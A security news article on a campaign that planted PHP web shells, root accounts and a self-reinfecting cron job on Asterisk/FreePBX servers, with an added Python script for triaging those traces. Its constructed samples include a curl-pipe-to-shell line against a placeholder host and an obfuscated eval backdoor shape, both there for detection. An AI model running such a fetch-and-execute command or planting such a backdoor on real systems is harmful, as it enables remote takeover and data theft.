A web shell was dropped on VoIP phone servers running Digium's software as part of an attack campaign aimed at exfiltrating data by downloading and running additional payloads. In a report published on Friday, Palo Alto Networks Unit 42 said the malware downloads new payloads for execution, installs multilayer obfuscated PHP backdoors into the web server file system, and schedules recurring tasks to re-infect the host.
The unusual activity targets Asterisk, a popular software implementation of a private branch exchange (PBX) that runs on the open-source Elastix Unified Communications Server, and is reported to have begun around mid-December 2021. Unit 42 suggested the intrusions may be a "resurgence" of earlier attacks, drawing a comparison to the INJ3CTOR3 campaign that Israeli cybersecurity firm Check Point disclosed in November 2020.
The sudden spike coincides with the December 2021 public disclosure of a now-patched remote code execution vulnerability in FreePBX, an open-source web-based GUI used to monitor and manage Asterisk. The flaw, tracked as CVE-2021-45461, carries a severity rating of 9.8 out of 10. The attacks begin by retrieving an initial dropper shell script from a remote server; that script installs the PHP web shell in multiple locations across the file system and creates two root user accounts for continued remote access.
The dropper also creates a scheduled job that runs every minute and fetches a fresh copy of the shell script from the attacker-controlled domain for execution. Beyond taking steps to cover its tracks, the malware can run arbitrary commands, which ultimately lets the attackers take control of the system, steal data, and maintain a backdoor into the infected hosts.
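The three persistence traits described above (a cron job running every minute that pulls a remote script, extra UID 0 accounts, and obfuscated PHP backdoors) each leave a checkable trace on the host. The following is an added triage script written for this article, not code from Unit 42 or from the campaign; the crontab, passwd and PHP samples are constructed, and the domain and decoder chain are placeholders.

```python
import re
from typing import List

# Constructed sample crontab: one benign nightly job, one minutely remote fetch, one 5-minute job.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * /usr/bin/curl -s http://placeholder.example/update.sh | /bin/sh
*/5 * * * * /usr/local/bin/asterisk-health-check
"""

# Constructed sample /etc/passwd with one extra UID 0 account besides root.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
asterisk:x:497:497::/var/lib/asterisk:/sbin/nologin
admin2:x:0:0::/home/admin2:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
"""

# Constructed PHP snippet in the shape of a layered decode-then-eval backdoor.
SAMPLE_PHP = '<?php eval(gzinflate(base64_decode("PLACEHOLDER"))); ?>'

FETCH_TOOLS = re.compile(r"\b(curl|wget|fetch)\b")
OBFUSCATED_EVAL = re.compile(
    r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I)


def minutely_fetch_jobs(crontab: str) -> List[str]:
    """Return crontab entries scheduled every minute whose command downloads content."""
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6:
            continue
        if fields[:5] == ["*"] * 5 and FETCH_TOOLS.search(fields[5]):
            hits.append(line)
    return hits


def extra_uid0_accounts(passwd: str) -> List[str]:
    """Return account names other than root that carry UID 0."""
    return [p[0] for p in (l.split(":") for l in passwd.splitlines())
            if len(p) >= 3 and p[2] == "0" and p[0] != "root"]


def looks_like_obfuscated_backdoor(php_source: str) -> bool:
    """Flag PHP source that evals the output of a decoding function (layered obfuscation)."""
    return bool(OBFUSCATED_EVAL.search(php_source))
```

On a real host, feed the functions the contents of the system and user crontabs, /etc/passwd, and each .php file under the web root; every hit is a lead to examine, not proof of compromise.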
“The strategy of implanting web shells in vulnerable servers is not a new tactic for malicious actors,” said the researchers, adding it’s a “common approach malware authors take to launch exploits or run commands remotely.”